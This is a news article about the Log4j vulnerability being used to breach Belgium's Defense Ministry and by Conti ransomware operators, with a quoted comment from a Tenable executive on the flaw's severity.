The ripples of Log4j vulnerability have been reaching various sectors across the globe. Belgium Defense Ministry is the latest victim to join the bandwagon of Log4j flaw victims. According to a report, the Belgian military confirmed a cyberattack affecting some of its systems connected to the internet. While threat actors behind this attack are unknown, the agency stated they took quarantine measures to restore the affected systems. The attack has been notified to the relevant authorities for further investigation.
Apache Log4j is a Java-based logging utility developed by the Apache Software Foundation. Several companies use the Log4j library worldwide to enable logging and configure a wide set of applications. The Log4j flaw permits hackers to run any code on vulnerable machines or hack into any application directly using the Log4j framework. Looking at its severity, MITRE rated the vulnerability as critical and assigned a CVSS score of 10/10.
Hackers Exploited Log4j Flaw
The report found that unknown hackers exploited the Log4j security vulnerability to penetrate and spy on the military systems. The vulnerability, which emerged recently and was labeled as the most critical flaw ever discovered, poses a significant risk to several governments and corporate networks across the globe. The Log4j flaw allegedly allows an attacker to take control of a vulnerable device, move around the victim’s network, and install malware or ransomware.
Ripples of Log4j
Recently, Conti ransomware operators abused the Log4j flaw (CVE-2021-44228) to access the internal VMware vCenter Server and encrypt vulnerable devices. Threat actors targeted specific vulnerable VMware vCenter for lateral movement directly from the compromised network resulting in vCenter access affecting victims in the U.S. and European networks. Conti ransomware became the first sophisticated ransomware group weaponizing Log4j vulnerability.
Commenting on the rising threats with Log4j vulnerability, Glen Pendley, Deputy Chief Technology Officer at Tenable, said, “Log4Shell, a critical vulnerability in Apache Log4j, is in a league above every other vulnerability we’ve seen in the last few decades. It gives flaws like Heartbleed and Shellshock, a run for their money because of just how pervasive and devastating it is. Everything across heavy industrial equipment, network servers, down to printers, and even your kid’s Raspberry Pi is potentially affected by this flaw. Some affected systems may be on-premises, others may be hosted in the cloud, but no matter where they are, the flaw is likely to have an impact.
Cybercriminals are already rubbing their hands with glee as early signs of ransomware activity have started to emerge. The worst part is, we aren’t even in the thick of it yet. Don’t be surprised when some major disruptions occur over the next few weeks and months, pointing at Log4j as the root cause.”